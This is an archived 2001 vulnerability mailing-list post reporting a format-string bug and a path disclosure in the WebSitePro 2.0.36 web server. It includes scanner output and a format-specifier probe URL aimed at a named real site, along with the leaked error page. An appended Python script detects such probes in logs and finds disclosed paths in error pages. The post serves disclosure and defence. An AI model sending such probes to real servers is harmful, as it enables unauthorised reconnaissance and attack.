Vulnerability Development mailing list archives

WebSitePro format bug + (old) its path.


From: Paulo Ribeiro <prrar () nitnet com br>
Date: Sun, 23 Dec 2001 00:53:57 -0200

$ ./psec www.estacio.br -h

P-SEC version 1.0 (alpha) - by Paulo Ribeiro, Dec. 2001.

- Date: Sun Dec 23 00:38:25 2001

- HTTP Server: WebSitePro version 2.0.36
* Alert: HTTP server may be vulnerable.

  -- Checking possible vulnerabilities:
  <cut>
  ---- Format bug (GET): found. (try http://host/%a%s%...)
  <cut>
$

Now, let's try to access the following link:
        http://www.estacio.br/%a%s%p%d

Here's what we get:
1       404 Not Found
2 
3       The requested URL was not found on this server:
4 
5       /*s?d
6 
7       (C:/WebSite/htdocs/*s?d)

So, we have:
line 5: format bug.
line 7: format bug + its path.

I don't know if this bug has already been fixed, as I've tested
version 2.0.36.

Yours,
Paulo Ribeiro   - prrar () nitnet com br
IME             - www.ime.eb.br
CSB             - www.csbrj.org.br
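
Added example, not part of the original post: a defender-side check that flags request targets containing a '%' not followed by two hex digits, as in the URL tested above, and error bodies that echo a local drive path, as in line 7 of the response. The log lines, the sample body and all function names are constructed for illustration.

```python
import re

# A '%' not followed by two hex digits is not a valid RFC 3986 percent-escape.
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
# Request line inside a Common Log Format entry.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Windows drive path echoed in a response body, e.g. C:/WebSite/htdocs/...
LOCAL_PATH = re.compile(r"\b[A-Za-z]:[\\/][^\s)<\"']+")

def malformed_escapes(target):
    """Count invalid percent-escapes in a request target."""
    return len(BAD_ESCAPE.findall(target))

def flag_requests(log_lines):
    """Return (line_number, target, count) for entries with invalid escapes."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        count = malformed_escapes(match.group("target"))
        if count:
            hits.append((number, match.group("target"), count))
    return hits

def leaked_paths(body):
    """Return local filesystem paths disclosed in an error page body."""
    return LOCAL_PATH.findall(body)

# Constructed access log: two ordinary requests and the probe from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Dec/2001:00:40:01 -0200] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [23/Dec/2001:00:40:07 -0200] "GET /docs/a%20b.html HTTP/1.0" 200 512',
    '192.0.2.77 - - [23/Dec/2001:00:41:12 -0200] "GET /%a%s%p%d HTTP/1.0" 404 211',
]

# Constructed body modelled on the 404 response quoted in the post.
SAMPLE_BODY = (
    "404 Not Found\n\n"
    "The requested URL was not found on this server:\n\n"
    "/*s?d\n\n"
    "(C:/WebSite/htdocs/*s?d)\n"
)

if __name__ == "__main__":
    for number, target, count in flag_requests(SAMPLE_LOG):
        print(f"log line {number}: {target} has {count} invalid percent-escapes")
    for path in leaked_paths(SAMPLE_BODY):
        print(f"error body discloses local path: {path}")
```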

